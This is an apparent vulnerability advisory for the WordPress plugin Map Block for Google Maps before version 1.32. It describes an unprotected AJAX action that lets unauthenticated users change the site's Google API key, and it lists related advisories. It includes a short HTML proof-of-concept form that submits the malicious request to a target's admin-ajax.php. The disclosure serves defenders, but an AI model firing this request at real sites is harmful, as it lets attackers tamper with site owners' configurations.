Map Block for Google Maps < 1.32 – Unauthorised Google API Key change | Plugin Vulnerabilities

Description

The gmw_map_block_save_key AJAX action, available to both authenticated and unauthenticated users did not have any check in place to prevent unauthorised change of the Google API key.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="gmw_map_block_save_key" />
      <input type="hidden" name="api_key" value="XXXX" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

map-block-gutenberg

Fixed in 1.32

References

URL

https://plugins.trac.wordpress.org/changeset/2470760

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

f1e6815a-a130-4490-9b56-6184cb110e44

Timeline

Publicly Published

2021-02-10 (about 5 years ago)

Added

2021-02-10 (about 5 years ago)

Last Updated

2021-02-10 (about 5 years ago)

Other

Published

Title

Published

2021-10-25

Title

Age Gate < 2.17.1 - Unauthenticated Import Settings

Published

2020-09-22

Title

Coditor <= 1.1 - Arbitrary File Edition, Deletion and Internal Directory Listing in wp-content

Published

2022-06-27

Title

miniOrange's Google Authenticator < 5.5.75 - Reflected Cross-Site Scripting

Published

2024-02-06

Title

Customer Reviews for WooCommerce < 5.39.0 - Improper Authorization via submit_review

Published

2024-02-27

Title

WordPress Access Control <= 4.0.13 - Improper Access Control to Sensitive Information Exposure via REST API